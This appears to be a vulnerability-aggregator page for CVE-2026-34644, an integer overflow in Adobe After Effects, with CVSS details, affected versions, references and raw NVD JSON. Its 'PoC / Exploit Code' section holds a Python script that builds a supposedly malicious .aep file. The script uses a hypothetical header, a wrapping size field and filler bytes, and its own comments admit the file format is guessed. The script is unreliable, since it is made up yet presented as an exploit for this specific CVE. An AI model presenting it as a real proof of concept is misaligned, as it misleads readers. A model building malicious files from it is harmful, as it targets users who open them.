CVE-2026-34644

Description

After Effects versions 26.0, 25.6.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:after_effects:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:after_effects:26.0:*:*:*:*:*:*:* - VULNERABLE

Adobe After Effects <= 25.6.4

Adobe After Effects 26.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# Proof of Concept for CVE-2026-34644 (Integer Overflow in Adobe After Effects)
# This script generates a malicious file structure to trigger the overflow.
# Note: Actual exploitation requires specific offsets within the file format.

def create_malicious_file(filename):
    with open(filename, 'wb') as f:
        # Write hypothetical file header
        f.write(b'AfterEffects')
        
        # Trigger Integer Overflow: 0xFFFFFFFF + 1 wraps to 0x00000000
        # Simulating a size field that the application increments
        malicious_size = 0xFFFFFFFF
        f.write(struct.pack('<I', malicious_size))
        
        # Payload data intended to overflow the allocated buffer
        # Assuming allocation happens based on the overflowed size
        payload = b'A' * 5000 
        f.write(payload)
        
    print(f"[+] Malicious file '{filename}' generated for testing purposes.")

if __name__ == "__main__":
    create_malicious_file("cve_2026_34644_poc.aep")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34644
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34644
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34644/
[4] VulDB https://vuldb.com/cve/CVE-2026-34644
[5] https://helpx.adobe.com/security/products/after_effects/apsb26-48.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34644", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:10.840", "lastModified": "2026-05-13T19:35:26.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "After Effects versions 26.0, 25.6.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:after_effects:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.6.5", "matchCriteriaId": "D4959152-FD14-4F5C-9D18-3B556EF207AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:after_effects:26.0:*:*:*:*:*:*:*", "matchCriteriaId": "EDD4903D-B357-4133-8BB1-D3A23D7319A8"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/after_effects/apsb26-48.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}